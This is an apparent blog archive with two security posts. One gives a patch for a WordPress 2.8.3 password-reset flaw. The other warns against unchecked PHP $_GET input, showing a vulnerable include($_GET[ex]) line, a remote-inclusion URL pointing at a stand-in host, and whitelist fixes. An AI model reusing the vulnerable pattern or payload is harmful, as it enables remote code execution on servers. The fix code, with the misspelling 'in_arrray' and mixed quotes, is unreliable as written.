Security

You are currently browsing the archive for the Security category.

Wordpress Security Vulnerability

August 12, 2009 in Security | 1 comment

With this security vulnerability, your admin password can be reset if your wordpress version <=2.8.3.  For more information about exploit visit: http://www.milw0rm.com/exploits/9410

Solution:

open wp-login.php

Find this line

if ( empty( $key ) )

and change with this:

if ( empty( $key ) || is_array( $key ) )


or

patch: http://wordpress.org/development/2009/08/2-8-4-security-release/

Related posts

Tags: , , ,

Php Get Security

March 23, 2009 in Security | No comments

It is very important to check your data that you take with $_GET before use.

You can use $_Get in some cases , in each case there are some different measures to be taken.

For example if you use sth like that

if(isset($_GET[ex]))

   include($_GET[ex]);

If you use this codes, bad users can include any page that they want in your web page

?ex=http://www.example.com/bad_page.php

With this they can include any page that they want.

$operation =array(‘add’,'delete’,'edit’,’save’);

if (in_arrray($_GET[ex],$operation))

.. make sth…

Also you can use switch,or if..

switch($_GET[ex]){
case ‘add’:  something…
break;
case ‘delete’: something…
break;
default: something…

with if

if($_GET[ex] == "add"){

Do something..
}

else if($_GET[ex] =="delete"){
Do something..
}

else
die("possible hack attempt");

Related posts

Tags: , ,